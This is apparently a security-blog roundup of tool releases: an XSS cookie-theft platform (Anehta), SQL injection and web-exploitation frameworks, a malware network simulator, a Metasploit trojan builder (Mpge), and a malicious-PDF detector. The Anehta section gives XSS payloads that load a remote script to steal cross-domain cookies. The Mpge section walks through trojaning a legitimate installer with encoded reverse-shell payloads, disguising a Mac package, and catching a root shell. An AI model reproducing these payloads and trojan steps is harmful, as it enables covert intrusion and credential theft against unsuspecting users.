Anehta V-0.6 released.

Anehta is Web Application tools for Security Audit.

 

=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS
=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in “server/class/auth_Class.php” file.
Default username is “admin” and default password is “123456”.
4. If you want to send mail, modify “server/mail.php” file to your own mail server or mailbox.
=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the “anehtaurl” as the url where your anehta is.
For example: “http://www.a.com/anehta”.
3. You should also input the boomerang src and boomerang target.
boomerang src is usually the same page where you put your feed.js is.
For example: boomerang src maybe: “http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>”.

boomerang target must be the page where you want to steal cross domain cookie.
For example: boomerang target maybe: “http://www.alimafia.com/xssDemo.html#’><script src=http://www.a.com/anehta/feed.js></script><‘”.

You can modify feed.js to cancel the xcookie module if you do not want to use boomerang.
But you must always set boomerang src and target values when you modify in the configure tab.

4. After modified configure, simply load feed.js as a external script to where your xss page is.
There is also a demo page in the directory which is “demo.html”

5. Refresh the admin.php, and you may see some changes if your xss slave coming.

Downnload In here | Read more Right here

 

BBQSQL is a blind SQL injection framework written in Python.

Change current released : fixing help menu
Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don’t you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.

Overview of Readme
We tried to write the tool in such a way that it would be very self explanatory when setting up an attack in the UI. However, for sake of thoroughness we have included a detailed Readme that should provide you additional insight on the specifics of each configuration option. One thing to note is that every configuration option in the UI has a description associated with it, so if you do choose to fire up the tool without reading this page you should be able to hack your way through an attack.

High Level Usage
Similar to other SQL injection tools you provide certain request information.

Must provide the usual information:

• URL
• HTTP Method
• Headers
• Cookies
• Encoding methods
• Redirect behavior
• Files
• HTTP Auth
• Proxies

Then specify where the injection is going and what syntax we are injecting. Read on for details.

Install
After you pull the tool from Github, you can install simply by typing:

python setup.py install

Download in here | Read more right here

Update Websploit V1.3 – Open source tool for scan and analysis Vulnerabilitys

WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability

Description :
[+]Autopwn – Used From Metasploit For Scan and Exploit Target Service
[+]wmap – Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector – inject reverse & bind payload into file format
[+]phpmyadmin – Search Target phpmyadmin login page
[+]lfi – Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
[+]apache users – search server username directory (if use from apache webserver)
[+]Dir Bruter – brute target directory with wordlist
[+]admin finder – search admin & login page of target
[+]MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
[+]MITM – Man In The Middle Attack

Platform : Unix/Linux

Download V1.3 : websploit-v 1.3.zip (1.1 MB)

Find other Version | Read more in here : http://code.google.com

FakeNet – Beta – Windows Network Simulation tool for Malware Analysis.

FakeNet is Windows network simulation tool designed for malware analysis. It redirects all traffic leaving a machine to the localhost (including hard-coded IP traffic and DNS traffic) and implements several protocols to ensure that malicious code continues to execute and can be observed by a malware analyst.

The tool supports DNS, HTTP, and SSL protocols and provides a python extension interface for implementing new or custom protocols. It also the capability to listen for traffic to any port as well as create packet capture on the localhost.

Right now the tool only support WinXP Service Pack 3. The tool runs fine on Windows Vista/7 although certain features will be automatically disabled.

Features

• Supports DNS, HTTP, and SSL
• HTTP server always serves a file and tries to serve a meaningful file; if the malware request a .jpg then a properly formatted .jpg is served, etc. The files being served are user configurable.
• Ability to redirect all traffic to the localhost, including traffic destined for a hard-coded IP address.
• Python extensions, including a sample extension that implements SMTP and SMTP over SSL.
• Built in ability to create a capture file (.pcap) for packets on localhost.
• Dummy listener that will listen and display traffic destined for any port.

Platform : Windows

Download Latest Version : FakeNet0.9.exe (8.3 MB)

Find Other Version |

Read more in here : http://practicalmalwareanalysis.com/

Mpge – a wrapper of msfpayload and msfencode of Metasploit

Mpge is a wrapper of msfpayload and msfencode of Metasploit. Is possible use it with Backtrack and Backbox.This wrapper creates trojan horses for Microsoft Windows, Linux and Mac Osx Panther, Tiger and Leopard.For mac osx in necessary after you creates a reverse shell insert in a package with Iceberg.dmg (Package Maker). Is possible creates files .dmg with DropDMG. I try this program after between two virtual machines: first real mac osx second virtual windows xp. Before i use this program between two real mac osx: The first mac osx is a mac book (black) and the second mac osx is a ibook g4 powerpc with os tiger. These two mac osx were connected on lan (intranet).The first mac osx (black) is in listening and expected the reverse shell. The second mac osx receive a packet (file .pkg or .dmg) and when the user click on file activate the reverse shell and insert a password with root. The first mac receive the reverse shell with root privilege.

Features

README

The script mpge.sh is a wrapper, while the files metrevshell443.rc, vncrevshell.rc, osxrev.rc, linux.rc are the files .rc that the script mpge.sh use to start the reverse shell and vnc reverse shell on Microsoft Windows. Osxrev.rc is a file that start reverse shell for mac osx and linux.rc is a file that start reverse shell for linux.

For create the trojan horse you can use a script and insert IP address and port before For create the trojan horse you can use a script and insert IP address and port before you need to go inside a script and insert the file originale that you want use. For example if you want use the file Clamavsetup.exe you insert the name in this line of script:

msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$porta R | msfencode -t exe -e x86/shikata_ga_nai -x ClamavSetup.exe -o ClamavSetup1.exe

Create a file named ClamavSetup1.exe and this is a trojan horse. The package per mac.doc is a doc that explains how to create these packets for mac osx.

Use the script evil.sh with the rev shell mac2 in a creation of packet as indicated in a doc package per mac.doc.

Dropdmg-3.1.2.dmg and Iceberg.dmg are the programs creates the files .pkg and .dmg for mac osx.

Creation Trojan Horse for mac osx and linux:

For Mac:

For creates the reverse shell for mac you use this syntax:

msfpayload osx/x86/shell_reverse_tcp LHOST=$ip LPORT=$porta X > mac2

chmod +x mac2

For Linux:

msfpayload linux/x86/shell/reverse_tcp LHOST=$ip LPORT=$porta X > linuxrev

chmod +x linuxrev

The encoding for Microsoft Windows is x86/shikata_ga_nai for mac and linux of course it is not necessary.

For create a packet for mac osx read package for mac.doc:

Use the script evil.sh and the rev shell mac2 in a creation of packet as indicated in a doc package per mac.doc.  In the scripts tab we select the Script Directory Iceberg (Package Maker) where we placed our post install script (mac2) and we select it in postinstall the script.(evil.sh). Now we click on the top left the Build button to build our pkg file. We place the file in a DMG on a share, on a USB stick or any other place from where our target will execute the installer thinking it is a valid package.We prepare our attacking machine to receive the shells that will be coming from the execution of the trojanned packaged in Metasploit and then we wait for the connections.

Example of reverse shell on mac osx:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD osx/x86/shell_reverse_tcp PAYLOAD => osx/x86/shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.103 LHOST => 192.168.1.103

msf exploit(handler) > set ExitOnSeesion falseExitOnSeesion => false

msf exploit(handler) > exploit

[*] Handler binding to LHOST 192.168.1.103

[*] Started reverse handler[*] Starting the payload handler…

[*] Command shell session 1 opened (192.168.1.103:4444 -> 192.168.1.120:58942)

id

uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff)pwd

/

uname –a  Darwin Nome Utente-computer.local 7.9.0 Darwin Kernel Version 7.9.0: Wed Mar 30 20:11:17 PST 2005; root:xnu/xnu-571.12.7.obj~1/RELEASE_PPC Power Macintosh Powerpc

Download : Mpge.tgz (14.9 MB)

or read more in here : http://sourceforge.net/

Malware Reverse Engineering part1 of 2. Static analysis

This malware report is part 1 of 2. Part 2 will focus heavily on dynamic analysis, determining packers/encryption used and finding original entry point (OEP) of the malware sample, and will utilize IDA Pro, and Immunity de-bugger extensively. We will also bypass anti-debugging, and anti-reversing tactics employed by attackers, and malware authors in part 2. Stay tuned! This report is an effort to track, categorize, contain, understand root cause and infection vector of said user account/s, networked equipment or computer/s. This report pertains to all incidents reported by TIER II help desk, TIER III engineers, customer complaints or random IT Security audit/finding/pen test.

Download This Papers

PJScan a command-line utility that uses a learning algorithm to detect PDF files with JavaScript-related malware (i.e., malicious PDF files)

PJScan is a command-line utility that uses a learning algorithm to detect PDF files with JavaScript-related malware (i.e., malicious PDF files). The name PJScan is an acronym for “PDF and JavaScript Scanner”.

The learning algorithm

PJScan utilizes a machine learning algorithm called a One-class Support Vector Machine (One-class SVM) to learn a model of malicious PDF files and then uses this model to classify previously unseen, suspicious PDF files. This is accomplished in a two-step process:

Learning a model of malicious files.

This step consists of applying PJScan’s learning algorithm on a collection of malicious PDF files. PJScan analyzes these files, extracts JavaScript scripts from them (using libpdfjs) and applies a JavaScript tokenizer (pjscan-js, a modified version of Mozilla SpiderMonkey) in order to obtain the lexical properties of the scripts. The token sequences are then used as input (converted by libstem) for the machine learning algorithm (a One-class SVM implementation called libsvm_oc, based on libsvm), which outputs a model of known malicious PDF files. This model (saved as a file) is used as the input to the second step.

Classification of previously unseen files.

After a model of PDF files that are known to be malicious has been learned, it’s used for the classification of previously unseen PDF files. Every PDF file to be classified has its JavaScript scripts extracted, tokenized and converted for use with the learning algorithm. Finally, the learning algorithm compares this information with the learned model and classifies the file as malicous or benign.

Other uses

In addition to learning and classification, PJScan also features some useful diagnostic tools:

• Dumping all JavaScript scripts from a PDF file.

You can use this tool to extract the source code of all JavaScript scripts from a certain PDF file for further analysis. The scripts are saved as UTF-8-encoded text files with a .js extension in a directory.

• Analysis of machine learning features.

Top N machine learning features are extracted from a PDF file and printed in comparison with the features found in a previously learned model. This is useful for the analysis of the impact of individual features of JavaScript code on the classification result.

System Support : Linux | Read More in here

Change log

Download in here  : http://sourceforge.net mirror pjscan.tgz